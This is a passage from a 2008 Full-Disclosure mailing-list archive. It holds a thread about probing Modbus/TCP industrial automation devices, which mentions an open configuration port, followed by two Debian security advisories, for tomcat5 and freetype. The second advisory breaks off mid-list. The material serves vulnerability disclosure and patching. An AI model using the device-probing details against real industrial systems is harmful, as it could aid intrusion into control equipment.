References: <477FD403.4060605@rogers.com>
Message-ID: <35a0b7430801070937v5d8f147yb4cad715467d7573@mail.gmail.com>

There's a ton of information on the Internet for Schneider/Modicon's
modbus protocol, including modbus+., modbusrtu, and modbustcp...
Specs are freely available
http://www.modbus.org/docs/Modbus_Application_Protocol_V1_1b.pdf.  If
you spend 2 minutes with google you'll find more then you'll need.
For example: http://www.modbus.pl/download/zxy66/v19/modbus_perl_client.zip.
 Anyways, enjoy your research...

On Jan 5, 2008 1:01 PM, gmaggro <gmaggro at rogers.com> wrote:
> OK, having done some digging a decent little chunk of industrial
> automation gear has started coming my way; 1 of 6 pieces. All totaled,
> roughly under $1000. Small standalone stuff for now; the shipping on
> populated PLC chassis like SLC-500 stuff is problematic.
>
> If people have specific technical questions, want a script run against a
> piece of gear or a custom protocol capture done I will entertain such
> requests. I am also willing to open the cases and pick up the soldering
> iron, attempt rom/firmware dumps, etc.
>
> Are there any particular tests or tools someone would like me to work
> into my routine right from the start?
>
> Hardware piece #1 is a Kohler Power Systems modbus/ethernet converter,
> pn# GM40165.
>
> So far, nmap (4.52) has been detecting the modbus running on port
> 502/tcp as asa-appl-proto. There is not a great deal of information out
> there about this protocol. The email contact associated with the port in
> some /etc/services files (ddube at modicon.com) is disabled, and the domain
> redirects to an industrial automation company (telemecanique.com).
> Running/OS details indicate Enerdis or Lantronix embedded. MAC prefix is
> 00:20:4A (Pronet Gmbh). I suppose I could have just posted the nmap
> output, but figured that might annoy people unduly.
>
> Perhaps it would be worth renaming 'asa-appl-proto' on 502 to 'modbus'
> or something related? Just a suggestion to make it clearer for some
> people. In any case, this is mitigated by scanning with the -C option
> which grabs info from 80 and 161 clearly identifying it as being a
> modbus related device, the sysDescr stating "Modbus/TCP to RTU Bridge".
> And oh yeah, it has a wide open text configuration interface on 9999.
>
> Handy/Interesting modbus tcp/udp links:
>
> http://jamod.sourceforge.net/development/tcp_master_howto.html
> http://jamod.sourceforge.net/kbase/protocol.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From jmm at debian.org  Mon Jan  7 18:41:20 2008
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Mon, 7 Jan 2008 19:41:20 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1453-1] New tomcat5 packages fix
	several vulnerabilities
Message-ID: <20080107184120.GA3406@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1453-1                  security at debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
January 07, 2008                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : tomcat5
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-3382 CVE-2007-3385 CVE-2007-5461

Several remote vulnerabilities have been discovered in the Tomcat
servlet and JSP engine. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2007-3382

    It was discovered that single quotes (') in cookies were treated
    as a delimiter, which could lead to an information leak.

CVE-2007-3385

    It was discovered that the character sequence \" in cookies was
    handled incorrectly, which could lead to an information leak.

CVE-2007-5461

    It was discovered that the WebDAV servlet is vulnerable to absolute
    path traversal.

For the stable distribution (etch), these problems have been fixed in
version 5.0.30-12etch1.

The old stable distribution (sarge) doesn't contain tomcat5.

The unstable distribution (sid) no longer contains tomcat5.

We recommend that you upgrade your tomcat5 packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/t/tomcat5/tomcat5_5.0.30-12etch1.diff.gz
    Size/MD5 checksum:    30232 4d49cb48fcbd1ffde3e1ab59751ea567
  http://security.debian.org/pool/updates/main/t/tomcat5/tomcat5_5.0.30-12etch1.dsc
    Size/MD5 checksum:     1343 986018050a2272e753d5ef8db7994524
  http://security.debian.org/pool/updates/main/t/tomcat5/tomcat5_5.0.30.orig.tar.gz
    Size/MD5 checksum:  3594081 0bf81a5293246aa509a3bfa1afeb3920

Architecture independent packages:

  http://security.debian.org/pool/updates/main/t/tomcat5/tomcat5_5.0.30-12etch1_all.deb
    Size/MD5 checksum:    45488 cb4b3ac3e28f621d70fa4a8098e8b1ac
  http://security.debian.org/pool/updates/main/t/tomcat5/libtomcat5-java_5.0.30-12etch1_all.deb
    Size/MD5 checksum:  3662182 f909205ef2d99e1343a2c54e06a40ba4
  http://security.debian.org/pool/updates/main/t/tomcat5/tomcat5-admin_5.0.30-12etch1_all.deb
    Size/MD5 checksum:   402176 4811ece0563a742982ecd7ffe0cd44b1
  http://security.debian.org/pool/updates/main/t/tomcat5/tomcat5-webapps_5.0.30-12etch1_all.deb
    Size/MD5 checksum:  1121936 14ed52052f9cc573fdf0648162370745


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHgnIOXm3vHE4uyloRAgOrAJwMQiXqq1oq03Ppv125PDyZLJEMSwCfUwnE
txJtvctGzk7bpphQw2PWqfs=
=l3H9
-----END PGP SIGNATURE-----



From jmm at debian.org  Mon Jan  7 19:48:32 2008
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Mon, 7 Jan 2008 20:48:32 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1454-1] New freetype packages fix
	arbitrary code execution
Message-ID: <20080107194832.GA7048@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1454-1                  security at debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
January 07, 2008                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : freetype
Vulnerability  : integer overflow
Problem-Type   : local
Debian-specific: no
CVE ID         : CVE-2007-1351

Greg MacManus discovered an integer overflow in the font handling of
libfreetype, a FreeType 2 font engine, which might lead to denial of
service or possibly the execution of arbitrary code if a user is tricked
into opening a malformed font.

For the unstable distribution (sid), this problem has been fixed in
version 2.3.5-1.

For the stable distribution (etch), this problem has been fixed in
version 2.2.1-5+etch2.

For the old stable distribution (sarge) this problem will be fixed
soon.

We recommend that you upgrade your freetype packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/f/freetype/freetype_2.2.1-5+etch2.dsc
    Size/MD5 checksum:      798 53491a8ea88f0a4da770cfd1755f0d85
  http://security.debian.org/pool/updates/main/f/freetype/freetype_2.2.1.orig.tar.gz
    Size/MD5 checksum:  1451392 a584e84d617c6e7919b4aef9b5106cf4
  http://security.debian.org/pool/updates/main/f/freetype/freetype_2.2.1-5+etch2.diff.gz
    Size/MD5 checksum:    31646 06bfc470001d3632ce192263b3ca8d5d

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.2.1-5+etch2_alpha.deb
    Size/MD5 checksum:   732154 f8f55e1bdf30a138f4f1c9b6113202e6
  http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.2.1-5+etch2_alpha.deb
    Size/MD5 checksum:   170460 c7446a14bcc43d0b7dd96e9994c4c9ef
  http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.2.1-5+etch2_alpha.deb
    Size/MD5 checksum:   385102 5f4a97c2a7d64f1a0b62cc5e2a096d1b
  http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.2.1-5+etch2_alpha.udeb
    Size/MD5 checksum:   279290 0249ffb7fecdd7a793f00c865c46a0e6

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.2.1-5+etch2_amd64.deb
    Size/MD5 checksum:   673818 96fbd82eeaa6cf095fd10aaa4736c358
  http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.2.1-5+etch2_amd64.udeb
    Size/MD5 checksum:   248188 a08b0a89d9857241d42ea7391d98e857
  http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.2.1-5+etch2_amd64.deb
    Size/MD5 checksum:   151550 5d947022a4dc7c1f14601e05993ef2d7
  http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.2.1-5+etch2_amd64.deb
    Size/MD5 checksum:   355316 9549934f5ae99b2ba7b3489406a59bf1

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.2.1-5+etch2_arm.deb
    Size/MD5 checksum:   134018 8b0b12e9e272d48e91d64b4decd5e3b6
  http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.2.1-5+etch2_arm.udeb
    Size/MD5 checksum:   227296 abdc445d2205d5f68aad13d0bcb1fdf6
  http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.2.1-5+etch2_arm.deb
    Size/MD5 checksum:   646606 565dc56c663f51eca98f40bc8a874b39
  http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.2.1-5+etch2_arm.deb
    Size/MD5 checksum:   333660 6730137bfadf2725e3ae199115317420

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.2.1-5+etch2_hppa.udeb
    Size/MD5 checksum:   260456 b144aa9234ae81c226d0a69985e0bbe5
  http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.2.1-5+etch2_hppa.deb
    Size/MD5 checksum:   150924 cb7bb50d6e4d5d803433d0025c849e68
  http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.2.1-5+etch2_hppa.deb
    Size/MD5 checksum:   680212 edae00c4fec4c702ac389881316fb376
  http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.2.1-5+etch2_hppa.deb
    Size/MD5 checksum:   366634 bb88a25651db4fc220469721f6664052

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.2.1-5+etch2_i386.deb
    Size/MD5 checksum:   135260 dec67a099a07602a703678d834e9bf5f
  http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.2.1-5+etch2_i386.udeb
    Size/MD5 checksum:   235868 127461c37904fd8df3a35c0371b97f8a
  http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.2.1-5+etch2_i386.deb
    Size/MD5 checksum:   341816 cbe96a1f686ac5abcd657976bc9c6388
  http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.2.1-5+etch2_i386.deb
    Size/MD5 checksum:   641568 3145b7a124c05e5a93a2761c928fcbac

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.2.1-5+etch2_ia64.deb
    Size/MD5 checksum:   816940 0d14a9d59fe989cc341fecdf4e273567
  http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.2.1-5+etch2_ia64.deb
    Size/MD5 checksum:   222246 08e1a94becfcf78b31d1be44f46759b2
  http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.2.1-5+etch2_ia64.udeb
    Size/MD5 checksum:   383392 0be639622637ed9e31190df0ea0f0820
  http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.2.1-5+etch2_ia64.deb
    Size/MD5 checksum:   488832 36deedfb0a679c6a58d9711b9